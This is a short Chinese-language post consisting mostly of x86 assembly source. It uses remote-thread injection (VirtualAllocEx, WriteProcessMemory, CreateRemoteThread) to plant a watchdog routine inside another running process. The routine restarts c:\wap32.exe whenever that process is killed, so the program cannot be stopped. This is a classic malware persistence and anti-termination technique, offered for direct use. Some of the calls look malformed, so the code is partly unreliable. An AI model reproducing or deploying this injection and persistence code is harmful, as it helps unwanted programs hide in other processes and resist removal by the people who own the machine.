此段程序采用公开的 Win2k注射远程线程,来保护指定进程始终处于运行状态。
生成wap32.exe拷贝到c:\下运行,则Wap32进程不死。
include Win32.inc
.386
.model flat,stdcall
.data
Protect2kProc proc ProcID: dword
call GetKnlOpenProcess
KnlOpenProcess dd ?
GetKnlOpenProcess:
pop eax
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
or eax,eax
jz short ExitProtectProc
mov ebx,eax
call GetKnlWaitForSingleObject
KnlWaitForSingleObject dd ?
GetKnlWaitForSingleObject:
pop eax
call [eax],ebx,-1h
call GetFileNameAddress
GetFileNameAddress:
pop ecx
add ecx,offset FileName-offset GetFileNameAddress
call GetKnlWinExec
KnlWinExec dd ?
GetKnlWinExec:
pop eax
call [eax],ecx,01
ExitProtectProc:
ret
Protect2kProc endp
FileName db 'c:\wap32.exe',0
KnlOpenProcessStr db 'OpenProcess',0
KnlWaitForObjectStr db 'WaitForSingleObject',0
KnlWinExecStr db 'WinExec',0
.code
extrn GetProcAddress: proc
extrn OpenProcess: proc
extrn FindWindowA: proc
extrn GetWindowThreadProcessId: proc
extrn VirtualAllocEx: proc
extrn VirtualFreeEx: proc
extrn WriteProcessMemory: proc
extrn GetCurrentProcessId: proc
extrn CreateRemoteThread: proc
extrn GetExitCodeThread: proc
extrn CloseHandle: proc
extrn WinExec: proc
extrn MessageBoxA: proc
extrn Sleep: proc
Start:
call GetProcAddress,077e60000h,offset KnlOpenProcessStr
mov KnlOpenProcess,eax
call GetProcAddress,077e60000h,offset KnlWaitForObjectStr
mov KnlWaitForSingleObject,eax
call GetProcAddress,077e60000h,offset KnlWinExecStr
mov KnlWinExec,eax
call FindWindowA,0,0
push eax
call GetWindowThreadProcessId,eax,esp
call OpenProcess,PROCESS_ALL_ACCESS,FALSE
or eax,eax
jz short OpenProcessError
mov ebx,eax
call VirtualAllocEx,ebx,NULL,1000h,MEM_COMMIT,L 40h
or eax,eax
jz short OpenProcessError
mov edi,eax
push eax
call WriteProcessMemory,ebx,edi,OFF Protect2kProc,1000h,esp
call GetCurrentProcessId
call CreateRemoteThread,ebx,NULL,NULL,edi,eax,NULL,esp
call GetExitCodeThread,eax,esp
pop eax
;call VirtualFreeEx,ebx,edi,1000h,MEM_DECOMMIT
call CloseHandle,ebx
call Sleep,100h
call MessageBoxA,0,offset FileName,offset FileName,0
OpenProcessError:
ret
end Start